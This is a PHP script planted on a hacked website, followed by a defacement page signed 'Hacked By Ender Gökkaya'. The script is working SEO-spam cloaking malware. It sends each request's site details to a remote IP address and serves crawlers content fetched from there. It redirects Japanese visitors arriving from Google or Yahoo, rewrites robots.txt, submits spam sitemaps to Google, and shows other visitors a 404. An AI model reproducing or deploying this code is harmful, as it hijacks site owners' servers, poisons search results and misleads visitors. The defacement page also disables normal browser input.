<?php $group_num='z0111_3';$inter_domain='http://204.12.234.170/'.$group_num.'/';function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){$robots_cont = getServerCont($url_robots,$data1);define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}exit;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } exit;} if(strpos($req_uri,"allsitemap.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1'){$data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit;}}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if($chk_refer && (preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER['REQUEST_URI'])))))){ echo getServerCont($jump1,$data1);exit; } $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if($res_crawl){ $data1['http_user_agent']=$user_agent;$get_content = getServerCont($indata1,$data1);if($get_content=="404"){header('HTTP/1.0 404 Not Found');exit;}else if($get_content=="500"){header("HTTP/1.0 500 Internal Server Error");exit;}else if($get_content=="blank"){echo '';exit;}else{echo $get_content;exit;} }else{ header("HTTP/1.0 404 Not Found"); } ?><html><head><meta charset="utf-8"><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="GENERATOR" content="Microsoft FrontPage Express 2.0"><meta name="title" content="Hacked By Sh434t"><meta name="description" content="hacked by ANONYMOUS VN"><meta name="keywords" content="hacked by ANONYMOUS VN,ANONYMOUS VN,Sh434t,413X308,Eo9ti,K07VN,hacked,deface,hacker,blackhat,shell bypass,defacer,mirror x-sec"><meta name="googlebot" content="index,follow"><meta name="robots" content="all"><meta name="robots schedule" content="auto"><meta name="distribution" content="global"><title>Hacked By Ender Gökkaya</title></head><body bgcolor="black" text="yellow" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="play()"><div class="stars"><div class="twinkling"><div class="flex-center position-ref full-height"><audio id="audio"><source src="https://kosred.com/a/psbpmf.mp4" type="audio/mpeg"></audio></center></div><p>&nbsp;</p><div align="center"><center><script> var x = document.getElementById("audio"); function play() { x.play();  }  </script><table border="0" cellspacing="8" width="80%"><tbody><tr><td align="right" valign="top"><p align="right"><img src="https://i.imgur.com/mZURR2t.png"><br><font size="1" face="Verdana">"what a worthless love<br> a love,<br> I don't know if it comes from one side<br> I think she knows I like her"<br> damned</font></p></td><td valign="top"><font size="1" face="Lucida Console"><strong>[log entry] [8:30 pm] [</strong></font><a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"><font size="1" face="Lucida Console"><strong>original index here</strong></font></a><font size="1" face="Lucida Console"><strong>]</strong></font><p><font size="1" face="Lucida Console">winter is the season to wear warm clothes when it's cold, so am I</font></p><p><font size="1" face="Lucida Console">it would be better when my hand was entwined with hers, that's right, the soft cloud I love. Every night I hold the teddy bear and think it's her, oh it's disgusting, she goes to the same school, the same age and great, her class is close to mine. This morning, her class was looking for the key or because of some problem she had to come in late, she had to stand outside the door with her friends. I went with my friend to take out the trash and I saw her easily, unfortunately she was quite cold to me. Once when she was walking up the stairs, she followed me and talked quite intimately with her friends of the opposite sex, which made me think a lot. Maybe I'm an idiot to think that she loves me the same way I love her.</font></p><p><font size="1" face="Lucida Console">for some reason, I found her so lonely in her classroom, so cramped</font></p><p><font size="1" face="Lucida Console">be happy, don't be sad because if your grades are not good, don't work too hard<strong></strong><strong></strong></font></p><p><font size="1" face="Lucida Console">"Knowing that you know that someone else loves you very much, I was very happy. But baby, I also love you very much.."</font></p><p><font size="1" face="Lucida Console">Hacked by Ender Gökkaya 1337</font></p><p><font size="1" face="Lucida Console"> Ender Gökkaya Was Here </font></p><p><font size="1" face="Lucida Console"><br><br><br></font></p></td></tr></tbody></table></center></div></body></html>